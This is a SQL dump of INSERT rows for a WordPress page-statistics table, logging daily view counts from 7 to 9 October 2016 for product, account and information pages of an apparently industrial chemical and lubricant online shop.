INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-07', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-07', 11, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-07', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-07', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-07', 3, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-07', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-07', 5, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-07', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-07', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-07', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-07', 10, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-07', 14, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-07', 5, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-07', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-07', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-07', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-07', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-07', 3, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-07', 3, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/?wc-ajax=get_refreshed_fragments', '2016-10-07', 10, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-07', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1007f/', '2016-10-07', 1, 941); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1007f/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 941); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-07', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-07', 2, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-07', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-07', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-07', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-07', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings', '2016-10-07', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-07', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-07', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-07', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-07', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-07', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-07', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements', '2016-10-07', 1, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/', '2016-10-07', 1, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-07', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-07', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-07', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-07', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-07', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-07', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-07', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-07', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-07', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-07', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-07', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry', '2016-10-07', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-07', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant', '2016-10-07', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-07', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants', '2016-10-07', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents', '2016-10-07', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing', '2016-10-07', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-07', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant', '2016-10-07', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-07', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters', '2016-10-07', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-07', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-07', 4, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-07', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-07', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-07', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-07', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-07', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-07', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-07', 2, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-07', 2, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-07', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-465c/', '2016-10-07', 1, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64/', '2016-10-07', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-07', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/', '2016-10-07', 1, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-10-07', 1, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/', '2016-10-07', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-07', 4, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-07', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-07', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-07', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-07', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-07', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-07', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-07', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143xd/', '2016-10-07', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/', '2016-10-07', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-10-07', 1, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/', '2016-10-07', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-07', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-07', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-08', 341, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-08', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-08', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-08', 58, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-08', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-08', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-08', 19, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-08', 3, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-08', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-08', 19, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-08', 10, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-08', 3, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-08', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-08', 2, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-08', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-08', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-08', 13, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-08', 14, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-08', 11, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-08', 8, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-08', 7, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-08', 8, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-08', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-08', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-08', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-08', 2, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-08', 9, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-10-08', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-08', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/?wc-ajax=get_refreshed_fragments', '2016-10-08', 2, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-08', 1, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-08', 2, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/?wc-ajax=get_refreshed_fragments', '2016-10-08', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-08', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-08', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-08', 3, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-08', 3, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroextreme-dental-lubricant/', '2016-10-08', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroextreme-dental-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/', '2016-10-08', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-08', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-08', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122se/', '2016-10-08', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122se/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-08', 2, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-08', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-08', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-08', 2, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-08', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-08', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-08', 2, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-08', 2, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-08', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-08', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-08', 2, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-08', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-08', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-08', 3, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-08', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-08', 6, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-08', 2, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-08', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-08', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-08', 2, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-08', 2, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-08', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-08', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-08', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-164/', '2016-10-08', 1, 955); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-164/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 955); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-08', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-153bn/', '2016-10-08', 1, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-153bn/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-08', 5, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-08', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/', '2016-10-08', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-08', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143xd/', '2016-10-08', 3, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/', '2016-10-08', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-10-08', 1, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-08', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-08', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-08', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122av/', '2016-10-08', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122av/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-08', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/?wc-ajax=get_refreshed_fragments', '2016-10-08', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-08', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-08', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-08', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-09', 301, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-09', 50, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-09', 10, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-09', 19, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-09', 7, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-09', 6, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-09', 25, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/1102/', '2016-10-09', 1, 1102); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-09', 3, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-09', 14, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-09', 13, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a3/', '2016-10-09', 2, 996); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-09', 3, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-09', 9, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-09', 10, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-09', 8, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-09', 6, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-09', 5, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-09', 5, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-09', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-09', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-09', 5, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-09', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-09', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-09', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143xd/', '2016-10-09', 6, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-09', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-09', 2, 440); 
